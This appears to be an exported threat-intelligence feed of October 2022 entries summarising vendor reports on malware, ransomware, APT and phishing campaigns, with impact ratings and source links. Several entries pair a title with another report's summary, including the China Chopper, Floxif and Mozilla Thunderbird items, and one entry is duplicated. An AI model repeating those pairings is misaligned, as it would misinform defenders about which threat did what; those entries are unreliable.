
Intel Source:: VMware

Intel Name:: Emotet_Malware_Using_Evasion_Techniques_in_Recent_Attacks

Date of Scan:: 2022-10-11

Impact:: LOW

Summary:: Researchers from VMware have analyzed the Threat actors associated with the notorious Emotet malware and are continually shifting their tactics and command-and-control (C2) infrastructure to escape detection.

Source: https://news.vmware.com/security/vmware-report-exposes-emotet-malware https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf

Intel Source:: TrendMicro

Intel Name:: A_Detailed_Analysis_of_Malicious_Tools_Used_by_Cyber_Espionage_Group_Earth_Aughisky

Date of Scan:: 2022-10-11

Impact:: LOW

Summary:: Trendmicro researchers have analyzed the Earth Aughisky threat group and tools with components that have yet to be identified, reported, or attributed to the group. The group is known for its ability to abuse legitimate accounts, software, applications, and other weaknesses in the network design and infrastructure for its own ends.

Source: https://www.trendmicro.com/en_us/research/22/j/tracking-earth-aughiskys-malware-and-changes.html

Intel Source:: Mandiant

Intel Name:: Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks

Date of Scan:: 2022-10-11

Impact:: LOW

Summary:: Researchers from Mandiant have discovered and tested the phishing-as-a-service (PhaaS) platform named 'Caffeine' service thoroughly. Post investigation, a large-scale phishing campaign ran through the service, targeting one of Mandiant's clients to steal Microsoft 365 account credentials.

Source: https://www.mandiant.com/resources/blog/caffeine-phishing-service-platform

Intel Source:: WeliveSecurity

Intel Name:: POLONIUM_threat_group_attacks_on_Israel_continue

Date of Scan:: 2022-10-11

Impact:: LOW

Summary:: ESET researchers shared their findings about POLONIUM, APT group which initial compromise vector is unknown. According to ESET telemetry, POLONIUM has custom backdoors and cyberespionage tools targeted more than a dozen organizations in Israel include engineering, information technology, law, communications, branding and marketing, media, insurance, and social services.

Source: https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/

Intel Source:: Chexmax

Intel Name:: The_installations_of_the_malicious_NPM_packages_by_“LofyGang”_group

Date of Scan:: 2022-10-10

Impact:: LOW

Summary:: Checkmarx discovered around 200 malicious NPM packages with thousands of installations linked to an attack group called “LofyGang”. This attack has been acting for over a year with multiple goals like getting credit card information, streaming services accounts (e.g. Disney+), Minecraft accounts, and more, discord “Nitro” (premium) upgrades.

Source: https://checkmarx.com/blog/lofygang-software-supply-chain-attackers-organized-persistent-and-operating-for-over-a-year/

Intel Source:: Team-cymru

Intel Name:: IcedID_campaign_metrics

Date of Scan:: 2022-10-10

Impact:: LOW

Summary:: Team Cymru researchers put together details metrics on the curtain on IcedID campaign metrics and Stage 1 C2 infrastructure, to shed light on behaviors and details not often available. These metrics are numbers the threat actors are watching as well, and just like any other business may influence their future actions.

Source: https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns

Intel Source:: CISA

Intel Name:: CISA_Malware_Analysis_Report_CovalentStealer

Date of Scan:: 2022-10-10

Impact:: MEDIUM

Summary:: Researchers at CISA gathered malware samples from live incident responses loaded with CovalentStealer, which is designed to identify and exfiltrate files to a remote server.

Source: https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a

Intel Source:: Cyble

Intel Name:: Modified_FiveM_Spoofer_activity

Date of Scan:: 2022-10-10

Impact:: LOW

Summary:: Cyble Researchers has continuously monitored phishing campaigns that distribute different malware families and recently, they identified a malicious site which redirects the user to a discord channel where the announcement is made by the Threat Actor for selling the spoofer to get unban from FiveM. The FiveM is the mod project that allows gamers to play Grand Theft Auto V (GTA5) with custom multiplayer modes on customized dedicated servers.

Source: https://blog.cyble.com/2022/10/07/modified-fivem-spoofer-targeting-gamers/

Intel Source:: Rewterz

Intel Name:: LockBit_3.0_Ransomware_Spreads_again

Date of Scan:: 2022-10-10

Impact:: MEDIUM

Summary:: Researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. The particular distribution method has not yet been discovered, but given that the file names include people’s names, such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx,’ it is possible that they were spread disguised as job applications, as in previous occurrences.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-3-0-ransomware-spreads-via-word-documents-active-iocs

Intel Source:: CISA

Intel Name:: The_"China_Chopper"_webshells_deailed_malware_report

Date of Scan:: 2022-10-10

Impact:: LOW

Summary:: The BazarCall campaigns were found to be most active in United States and Canada. BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold called by the attacker, except in BazarCall’s case, targeted users must dial the number.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html

Intel Source:: CISA

Intel Name:: CISA_Malware_Analysis_Report_HyperBro

Date of Scan:: 2022-10-10

Impact:: MEDIUM

Summary:: Researchers at CISA gathered malware samples from live incident responses loaded with HyperBro, a Remote Access trojan enabling attackers to a backdoor.

Source: https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b

Intel Source:: ISC.SANS

Intel Name:: Another_look_at_recent_IcedID_campaigns

Date of Scan:: 2022-10-10

Impact:: LOW

Summary:: Researcher from ISAC had another look at recent IcedID campaigns using PNG files to hide their malicious payload.

Source: https://isc.sans.edu/diary/More+IcedID/29116

Intel Source:: CISA

Intel Name:: CISA_Malware_Analysis_Report:_HyperBro

Date of Scan:: 2022-10-10

Impact:: MEDIUM

Summary:: Researchers at CISA gathered malware samples from live incident responses loaded with HyperBro, a Remote Access trojan enabling attackers to a backdoor.

Source: https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b

Intel Source:: Inquest

Intel Name:: A_close_look_at_an_item_called_CustomXMLParts

Date of Scan:: 2022-10-10

Impact:: LOW

Summary:: In this post the reseracher covered an item called "CustomXMLParts". It is an XML container to store arbitrary data to be used in the document. The intention for it appears to give the developer a way to change the formatting of the Office document that is not already available or add additional functionality.

Source: https://inquest.net/blog/2022/10/03/hiding-xml

Intel Source:: SpiderLabs

Intel Name:: Phishers_Using_HTML_Attachments_to_Steal_Sensitive_Information

Date of Scan:: 2022-10-07

Impact:: LOW

Summary:: According to Trustwave SpiderLabs, HTML file attachments have become a common occurrence in spam traps. As phishing spam is often a vehicle for malware delivery, this is not uncommon.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-file-attachments-still-a-threat/

Intel Source:: Trellix

Intel Name:: BazarCall_social_engineering_tactics

Date of Scan:: 2022-10-07

Impact:: LOW

Summary:: The BazarCall campaigns were found to be most active in United States and Canada. BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold called by the attacker, except in BazarCall’s case, targeted users must dial the number.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html

Intel Source:: BlackBerry

Intel Name:: Mustang_Panda_APT_Group_Leveraging_PlugX_Malware_Family

Date of Scan:: 2022-10-07

Impact:: LOW

Summary:: Researchers from BlackBerry have discovered a campaign by an APT group called Mustang Panda that is leveraging the PlugX malware family to target the Southeast Asian state of Myanmar.

Source: https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims

Intel Source:: Medium

Intel Name:: A_novel_backdoor_malware_targeting_Microsoft_SQL_servers

Date of Scan:: 2022-10-07

Impact:: LOW

Summary:: DCSO CyTec recently found a novel backdoor malware targeting Microsoft SQL servers. The malware comes in form of an “Extended Stored Procedure” DLL, a special type of extension used by Microsoft SQL servers. Once loaded into a server by an attacker, it is controlled solely using SQL queries.

Source: https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01

Intel Source:: ISC.SANS

Intel Name:: Domain_Generation_Algorithm_tactic_used_by_malware

Date of Scan:: 2022-10-07

Impact:: LOW

Summary:: Researcher from ISAC discovered a simple malicious PowerShell script that implements a backdoor with DGA capability. (“Domain Generation Algorithm") is a popular tactic used by malware to make connections with their C2 more stealthy and difficult to block. The idea is to generate domain names periodically and use them during the defined period.

Source: https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122/

Intel Source:: Fortinet

Intel Name:: Hackers_Exploiting_CVE_2017_11882_and_Delivering_Multiple_Malware

Date of Scan:: 2022-10-07

Impact:: LOW

Summary:: Researchers at FortiGuard have found a malicious file embedded in an Excel document. Embedded files with randomized file names exploit vulnerability CVE-2017-11882 to execute malicious code that delivers and executes malware on victims' devices.

Source: https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two

Intel Source:: Cyble

Intel Name:: Fake_Ransomware_Spreading_via_Phishing_Emails

Date of Scan:: 2022-10-07

Impact:: LOW

Summary:: Researchers from Cyble have identified a website that is distributing a fake ransomware executable. Instead of encrypting files, the Fake Ransomware changes file names and extensions, drops ransom notes, and threatens victims to pay a ransom as usual.

Source: https://blog.cyble.com/2022/10/06/fake-ransomware-infection-under-widespread/

Intel Source:: DCSO CyTec Blog

Intel Name:: Over_250_Microsoft_SQL_Servers_Infected_By_New_Maggie_Malware

Date of Scan:: 2022-10-06

Impact:: MEDIUM

Summary:: DCSO CyTec researchers have identified a new malware, named Maggie, that has already infected over 250 Microsoft SQL servers worldwide. Most of the infected instances are in South Korea, India, Vietnam, China, Russia, Thailand, Germany, and the United States.

Source: https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01

Intel Source:: Zscaler

Intel Name:: Diving_Deep_into_LilithBot_Malware

Date of Scan:: 2022-10-06

Impact:: LOW

Summary:: Zscaler researchers have discovered a sample of multi-function malware called "LilithBot" which is associated with the Eternity threat group (a.k.a. EternityTeam; Eternity Project), linked to the Russian “Jester Group,” that has been active since at least January 2022.

Source: https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group?&web_view=true

Intel Source:: BitDefender

Intel Name:: DLL_Side_Loading_Attack_Leveraging_OneDrive_Application

Date of Scan:: 2022-10-06

Impact:: LOW

Summary:: Researchers from BitDefender have identified and documented a cryptojacking campaign exploiting known DLL sideloading vulnerabilities in Microsoft OneDrive.

Source: https://www.bitdefender.com/files/News/CaseStudies/study/424/Bitdefender-PR-Whitepaper-SLOneDriveCyberJack-creat6318-en-EN.pdf

Intel Source:: BitSight

Intel Name:: A_Deep_Examination_of_PseudoManuscrypt_Malware

Date of Scan:: 2022-10-06

Impact:: LOW

Summary:: The BitSight researchers have analyzed PseudoManuscrypt malware. They describe how researchers went from unknown DGA-like domains to sinkholes and mimicked a relatively recent botnet that has infected nearly 500,000 machines (2.2M unique IP addresses) across at least 40 countries in the last 8 months, and has an estimated botnet size of around 50,000 machines.

Source: https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1

Intel Source:: Fortinet

Intel Name:: Phishing_Campaigns_in_Q3_Delivering_Malware

Date of Scan:: 2022-10-06

Impact:: MEDIUM

Summary:: Researchers from Fortinet have elaborated on multiple phishing campaigns in Q3 delivering malware, targetting windows users.

Source: https://www.fortinet.com/blog/threat-research/delivery-of-malware-phishing-campaigns-in-q3-2022

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_file_extension_changed_from_js_to_wsf

Date of Scan:: 2022-10-05

Impact:: LOW

Summary:: Researchers from ASEC have analyzed the Magniber ransomware script in the WSF format, changing the extension from *.js to *.wsf.

Source: https://asec.ahnlab.com/en/39489/

Intel Source:: Securelist

Intel Name:: The_OnionPoison_malicious_campaign

Date of Scan:: 2022-10-05

Impact:: LOW

Summary:: Securelist researchers discovered multiple downloads of previously unclustered malicious Tor Browser installers. According to their measuremant, all the victims targeted by these installers are located in China.

Source: https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/

Intel Source:: Crowdstrike

Intel Name:: Hackers_using_Comm100_Desktop_Agent_App_to_Spread_Malware

Date of Scan:: 2022-10-05

Impact:: LOW

Summary:: Researchers from CrowdStrike have identified a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor.

Source: https://www.crowdstrike.com/blog/new-supply-chain-attack-leverages-comm100-chat-installer/

Intel Source:: Cofense

Intel Name:: The_utilize_of_Wufoo_phishing_scams

Date of Scan:: 2022-10-05

Impact:: LOW

Summary:: The Cofense Phishing Defence Center recently observed the phishing scams that utilize the online form builder Wufoo, a tool commonly associated with easily created surveys and online registration forms. Threat actors have used Wufoo to create simplistic but effective credential stealing vectors.

Source: https://cofense.com/blog/scammers-utilize-wufoo-for-vacation-request-phish

Intel Source:: Avast

Intel Name:: A_MafiaWare666_ransomware_decryption_tool

Date of Scan:: 2022-10-05

Impact:: LOW

Summary:: Avast researchers release a MafiaWare666 ransomware decryption tool. They discovered a vulnerability in the encryption schema that allows some of the variants to be decrypted without paying the ransom. New or previously unknown samples may encrypt files differently, so they may not be decryptable without further analysis. MafiaWare666 is also known as JCrypt, RIP Lmao, BrutusptCrypt or Hades.

Source: https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/

Intel Source:: Sophos

Intel Name:: BlackByte_Malware_returns_with_new_tactics

Date of Scan:: 2022-10-05

Impact:: LOW

Summary:: Researchers from Sophos uncovered BlackByte with new tactics to bypass security products by leveraging the RTCore64.sys vulnerability.

Source: https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/

Intel Source:: eSentire

Intel Name:: Highly_evasive_SolarMarker_malware_activity

Date of Scan:: 2022-10-05

Impact:: LOW

Summary:: Researchers from eSentire have observed a spike in drive-by download malware campaigns delivering SolarMarker disguised as document templates.

Source: https://www.esentire.com/security-advisories/solarmarker-malware-activity

Intel Source:: WeliveSecurity

Intel Name:: Lazarus_group_exploiting_Dell_Driver_Vulnerability_to_Disable_Windows_Security

Date of Scan:: 2022-10-04

Impact:: MEDIUM

Summary:: ESET researchers have identified the Lazarus group deploying a tool on target systems that exploits the Dell DBUtil flaw to disable the monitoring of all security solutions on compromised machines, using never-before-seen techniques against Windows kernel mechanisms.

Source: https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

Intel Source:: Securelist

Intel Name:: Diving_Deep_into_DeftTorero_Actor

Date of Scan:: 2022-10-04

Impact:: LOW

Summary:: Researchers from Securelist have deeply analyzed the DeftTorero threat actor (aka Lebanese Cedar, Volatile Cedar) and it is believed to originate from the Middle East.

Source: https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

Intel Source:: Microsoft

Intel Name:: North_Korean_Hackers_Leveraging_Open_Source_Software

Date of Scan:: 2022-10-04

Impact:: MEDIUM

Summary:: Researchers from Microsoft have observed that Zinc threat actor leveraging a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for the attacks.

Source: https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/

Intel Source:: Sygnia

Intel Name:: Linux_ransomware_Cheerscrypt_linked_with_Chinese_DEV_0401_APT_group

Date of Scan:: 2022-10-04

Impact:: LOW

Summary:: Researchers from Sygnia have investigated the Cheerscrypt ransomware attack which utilized Night Sky ransomware TTPs and, found Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10).

Source: https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group

Intel Source:: BlackBerry

Intel Name:: New_variant_of_ransomware_dubbed_DJVU

Date of Scan:: 2022-10-04

Impact:: MEDIUM

Summary:: BlackBerry researchers have identified a new DJVU ransomware that includes several layers of obfuscation. The threat group connected with other threats, giving them the option to download and deploy information stealers to exfiltrate data, giving threat actors a second way to benefit at victims’ expense.

Source: https://blogs.blackberry.com/en/2022/09/djvu-the-ransomware-that-seems-strangely-familiar

Intel Source:: Fortinet

Intel Name:: Hackers_using_Microsoft_Office_Documents_to_Deliver_Agent_Tesla_and_njRat

Date of Scan:: 2022-10-04

Impact:: LOW

Summary:: Researchers from Fortinet have analyzed some malicious Microsoft Office documents that attempted to leverage legitimate websites to execute a shell script and then dropped two malware variants of Agent Tesla and njRat.

Source: https://www.fortinet.com/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat?&web_view=true

Intel Source:: Checkpoint

Intel Name:: Bumblebee_malware_continues_to_expand_its_capabilities

Date of Scan:: 2022-10-04

Impact:: LOW

Summary:: Researchers from Checkpoint have observed the changes in the behavior of Bumblebee’s servers that occurred around June 2022 indicating that the attackers may have shifted their focus from extensive testing of their malware to reaching as many victims as possible.

Source: https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

Intel Source:: Citizenlab

Intel Name:: New_Pegasus_Spyware_Abuses

Date of Scan:: 2022-10-04

Impact:: LOW

Summary:: Researchers from Mexican digital rights organization R3D have identified Pegasus infections against journalists and a human rights defender and Citizen Lab provided technical support for R3D’s analysis and validated the infections.

Source: https://citizenlab.ca/2022/10/new-pegasus-spyware-abuses-identified-in-mexico/

Intel Source:: TrendMicro

Intel Name:: The_malicious_decentralized_application_websites_abused_by_Water_Labbu

Date of Scan:: 2022-10-03

Impact:: LOW

Summary:: TrendMicro discovered a threat actor and named Water Labbu that was targeting cryptocurrency scam website

Source: https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html

Intel Source:: Disinfo Lab

Intel Name:: Media_clones_serving_Russian_propaganda_in_Europe

Date of Scan:: 2022-10-03

Impact:: LOW

Summary:: EU DisinfoLab researchers have investigated a large disinformation campaign targeting western audiences with pro-Russian propaganda.

Source: https://www.disinfo.eu/wp-content/uploads/2022/09/Doppelganger-1.pdf

Intel Source:: Mandiant

Intel Name:: A_deploying_malware_on_the_ESXi_Hypervisors

Date of Scan:: 2022-10-03

Impact:: LOW

Summary:: Mandiant is investigating Novel Malware wich being persistence within ESXi Hypervisors. Mandiant tracked this actvity with the threat actor group UNC3886. Given the highly targeted and evasive nature of this intrusion, Mandiant suspects UNC3886 motivation to be cyber espionage related.

Source: https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence

Intel Source:: Securonix

Intel Name:: Hackers_Targeting_Military_and_Weapons_Contractors

Date of Scan:: 2022-10-03

Impact:: MEDIUM

Summary:: Researchers from Securonix have identified a new phishing campaign targeting multiple military contractors involved in weapon manufacturing, including an F-35 Lightning II fighter aircraft components supplier.

Source: https://www.securonix.com/blog/detecting-steepmaverick-new-covert-attack-campaign-targeting-military-contractors/

Intel Source:: Symantec

Intel Name:: Malware_hidden_in_Windows_logo_in_cyber_attacks_against_Middle_Eastern_governments

Date of Scan:: 2022-10-03

Impact:: MEDIUM

Summary:: Symantec researchers have observed threat actors using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

Intel Source:: Esentire

Intel Name:: Mozilla_Thunderbird_distributing_Redline_Stealer

Date of Scan:: 2022-10-03

Impact:: LOW

Summary:: Researchers from Esentire have discovered some of the most dangerous threats including the Kaseya MSP breach and the more_eggs malware in the recent analysis.

Source: https://www.esentire.com/blog/redline-stealer-and-mozilla-thunderbird

Intel Source:: SentinelOne

Intel Name:: North_Korea_Lazarus_Hackers_Targeting_macOS_Users

Date of Scan:: 2022-10-03

Impact:: MEDIUM

Summary:: SentinelOne researchers have reviewed the details of Operation In(ter)ception campaign and observed a further variant in the same campaign using lures for open positions at rival exchange Crypto.com

Source: https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/

Intel Source:: Cyble

Intel Name:: A_new_ransomware_Bl00dy

Date of Scan:: 2022-10-03

Impact:: LOW

Summary:: Researchers from Cyble have identified a new ransomware named “Bl00dy” that is targeting organizations using double extortion techniques. A ransom note is created on the system to demand payment for the encrypted files. After the ransomware encrypts the files, it appends their extension with ".bl00dy."

Source: https://blog.cyble.com/2022/09/28/bl00dy-new-ransomware-strain-active-in-the-wild/

Intel Source:: Lumen

Intel Name:: New_Go_Based_Malware_Targeting_Windows_and_Linux_Systems

Date of Scan:: 2022-10-03

Impact:: MEDIUM

Summary:: Researchers from Lumen have identified a new multi-functional Go-based malware named Chaos. The malware is rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet.

Source: https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/?utm_source=press+release&utm_medium=referral

Intel Source:: GTSC

Intel Name:: Unpatched_Microsoft_Exchange_Zero-Day_Under_Active_Exploitation

Date of Scan:: 2022-10-03

Impact:: MEDIUM

Summary:: Researchers from GTSC have identified the flaws in fully patched Microsoft Exchange servers being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems.

Source: https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html

Intel Source:: Sucuri

Intel Name:: New_Malware_Variants_Deliver_Fake_Cloudflare_DDoS_Captcha

Date of Scan:: 2022-09-30

Impact:: LOW

Summary:: Researchers from Sucuri have identified the user is prompted with a bogus Cloudflare DDoS protection screen, but in this new wave, they observed a fake CAPTCHA dialog masquerading as the popular Cloudflare service.

Source: https://blog.sucuri.net/2022/09/new-malware-variants-serve-bogus-cloudflare-ddos-captcha.html

Intel Source:: Zscaler

Intel Name:: Hackers_using_Quantum_Builder_to_deliver_Agent_Tesla_RAT

Date of Scan:: 2022-09-30

Impact:: LOW

Summary:: Zscaler ThreatLabz researchers have observed a campaign that delivers Agent Tesla, a .NET-based keylogger and remote access trojan (RAT), using a builder named “Quantum Builder” sold on the dark web.

Source: https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps

Intel Source:: Palo Alto

Intel Name:: Polyglot_File_Delivering_IcedID

Date of Scan:: 2022-09-30

Impact:: LOW

Summary:: PaloAlto researchers have observed a polyglot Microsoft Compiled HTML Help file being employed in the infection process used by the information stealer IcedID.

Source: https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/

Intel Source:: Crowdstrike

Intel Name:: The_examination_of_Wiper_Malware_Part_3

Date of Scan:: 2022-09-30

Impact:: LOW

Summary:: Researchers from CrowdStrike have covered various input/output controls (IOCTLs) in more detail and how they are used to achieve different goals — including acquiring information about infected machines and locking/unlocking disk volumes, among others.

Source: https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

Intel Source:: Palo Alto

Intel Name:: Finding_APTs_using_Unsigned_DLLs_Loader

Date of Scan:: 2022-09-30

Impact:: MEDIUM

Summary:: PaloAlto researchers have observed a method called "unsigned DLL loading" which is the technique to evade detection and execute more sophisticated attacks.

Source: https://unit42.paloaltonetworks.com/unsigned-dlls/

Intel Source:: Multiple

Intel Name:: LockBit_3_0_aka_LockBit_Black

Date of Scan:: 2022-09-30

Impact:: MEDIUM

Summary:: Researchers have analyzed the LockBit and identified it is back with LockBit 3.0

Source: https://docs.google.com/spreadsheets/d/1Now95XPSkvEiCJy5H5iqgTDKi_ATZeBY_PhnxSUhWl8/edit#gid=0

Intel Source:: Cyble

Intel Name:: Detecting_and_Removing_Malicious_Software_Masquerading_as_Doenerium_Stealer

Date of Scan:: 2022-09-30

Impact:: LOW

Summary:: A spear phishing email campaign targeting Office365 users hve observed by Cyble researchers. The same domain has also been onserved hosting several other malware variants, such as Doenerium stealer.

Source: https://blog.cyble.com/2022/09/28/new-information-stealer-targeting-crypto-wallets/

Intel Source:: Cisco Talos

Intel Name:: A_new_Cobalt_Strike_payload_campaign

Date of Scan:: 2022-09-30

Impact:: MEDIUM

Summary:: Researchers from Cisco have discovered a campaign that is delivering Cobalt Strike beacons that could be used in later, follow-on attacks.

Source: https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html

Intel Source:: SentinelOne

Intel Name:: Void_Balaur_hack_for_hire_campaigns

Date of Scan:: 2022-09-29

Impact:: MEDIUM

Summary:: SentinelOne researchers have observed the cyber mercenary group known as Void Balaur continues to expand its hack-for-hire campaigns and targeting of a wide variety of individuals and organizations across the globe.

Source: https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/

Intel Source:: ASEC

Intel Name:: LockBit_3_0_Ransomware_Spreading_via_Word_Documents

Date of Scan:: 2022-09-29

Impact:: LOW

Summary:: ASEC researchers have identified that LockBit 3.0 ransomware distributed while disguised as job application emails in NSIS format is also being distributed in Word document format.

Source: https://asec.ahnlab.com/en/39242/ https://asec.ahnlab.com/en/39259/

Intel Source:: Securelist

Intel Name:: Mass_Emailing_campaign_delivering_Agent_Tesla_malware

Date of Scan:: 2022-09-28

Impact:: LOW

Summary:: Researchers from Securelist have discovered a spam campaign that delivers Agent Tesla malware. After analysis, the email messages were pretended as high-quality imitations of business inquiries by real companies.

Source: https://securelist.com/agent-tesla-malicious-spam-campaign/107478/

Intel Source:: Cluster25

Intel Name:: A_new_variant_of_Graphite_Malware

Date of Scan:: 2022-09-28

Impact:: MEDIUM

Summary:: Cluster25 researchers have analyzed a lure document used to implant a variant of Graphite malware, which is linked to the threat actor known as APT28.

Source: https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/

Intel Source:: ReversingLab

Intel Name:: Malicious_NPM_package_discovered_in_supply_chain_attack

Date of Scan:: 2022-09-28

Impact:: MEDIUM

Summary:: Researchers from ReversingLabs have identified the Material Tailwind library is being impersonated for an apparent supply chain attack targeting developers. The team spotted a look-alike NPM package circulating on repositories, intended to trick unwitting developers into using the package in place of the real library.

Source: https://blog.reversinglabs.com/blog/threat-analysis-malicious-npm-package-mimicks-material-tailwind-css-tool

Intel Source:: Securelist

Intel Name:: A_Trojan_Downloader_Named_NullMixer

Date of Scan:: 2022-09-28

Impact:: LOW

Summary:: Researchers from Securelist have identified a large proportion of the malware families dropped by NullMixer are classified as Trojan-Downloaders.

Source: https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

Intel Source:: DFIR Report

Intel Name:: BumbleBee_Malware_Deploying_Cobalt_Strike_and_Meterpreter

Date of Scan:: 2022-09-27

Impact:: LOW

Summary:: Researchers from DFIR have identified threat actors using BumbleBee malware to deploy Cobalt Strike and Meterpreter. They used RDP and SMB to move around the network looking at backup systems and file shares before being evicted from the network.

Source: https://thedfirreport.com/2022/09/26/bumblebee-round-two/

Intel Source:: ASEC

Intel Name:: FARGO_Ransomware_Targeting_Vulnerable_Microsoft_SQL_Servers

Date of Scan:: 2022-09-27

Impact:: LOW

Summary:: Researchers from ASEC have discovered the distribution of FARGO ransomware that is targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware that targets vulnerable MS-SQL servers.

Source: https://asec.ahnlab.com/en/39152/

Intel Source:: GitHub Blog

Intel Name:: Phishing_Campaign_Targeting_GitHub_Accounts

Date of Scan:: 2022-09-27

Impact:: LOW

Summary:: Researchers from GitHub security team have identified that the hackers are targeting GitHub users to steal credentials and two-factor authentication (2FA) codes by impersonating the CircleCI DevOps platform.

Source: https://github.blog/2022-09-21-security-alert-new-phishing-campaign-targets-github-users/

Intel Source:: ISC.SANS

Intel Name:: Floxif_Malware_Family_Leveraging_Cookies

Date of Scan:: 2022-09-27

Impact:: LOW

Summary:: Researchers from SANS have analyzed a recently disclosed vulnerability by Vectra that affects Microsoft Teams.

Source: https://isc.sans.edu/forums/diary/Kids+Like+Cookies+Malware+Too/29082/

Intel Source:: Morphisec

Intel Name:: NFT_Malware_Gets_New_Evasion_Abilities

Date of Scan:: 2022-09-26

Impact:: LOW

Summary:: Researchers from Morphisec have tracked several waves of the NFT malware delivering the Remcos RAT. In June 2022 they found a shift in the crypter used to deliver the Remcos RAT. The Babadeda crypter has now been discarded for a newly staged downloader.

Source: https://blog.morphisec.com/nft-malware-new-evasion-abilities

Intel Source:: SentinelOne

Intel Name:: New_Hacking_Group_Metador_Targeting_Telecommunications_ISPs_and_Universities

Date of Scan:: 2022-09-26

Impact:: MEDIUM

Summary:: Researchers from SentinelOne have discovered a new threat actor named Matador and targeting telecommunications, internet service providers, and universities in several countries in the Middle East and Africa.

Source: https://assets.sentinelone.com/sentinellabs22/metador

Intel Source:: Symantec

Intel Name:: Noberus_Ransomware_Continues_to_Develop_its_TTPs

Date of Scan:: 2022-09-26

Impact:: LOW

Summary:: Symantec researchers have identified that the Noberus (aka BlackCat, ALPHV) ransomware is using new tactics, tools, and procedures in recent months which making the threat more dangerous than ever.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

Intel Source:: Sansec

Intel Name:: Cybercriminals_target_Magento_vulnerability_in_new_wave_of_attacks

Date of Scan:: 2022-09-26

Impact:: LOW

Summary:: Researchers from Sansec have observed a surge in hacking attempts targeting CVE-2022-24086, a critical Magento 2 vulnerability allowing unauthenticated attackers to execute code on unpatched sites.

Source: https://sansec.io/research/magento-2-template-attacks

Intel Source:: Cybergeeks

Intel Name:: A_Technical_Analysis_of_Lockbit_3_0_Builder

Date of Scan:: 2022-09-26

Impact:: LOW

Summary:: Researchers from Cybergeeks have analyzed LockBit 3.0 builder that was leaked online on 21st September 2022.

Source: https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/

Intel Source:: Recorded Future

Intel Name:: Chinese_Hacker_Group_TA413_Evolves_Capabilities_to_Targeting_Tibetan

Date of Scan:: 2022-09-26

Impact:: LOW

Summary:: RecordedFuture researchers have observed the targeting of ethnic and religious minority communities by Chinese state-sponsored groups for surveillance and intelligence-gathering purposes.

Source: https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets

Intel Source:: BitSight

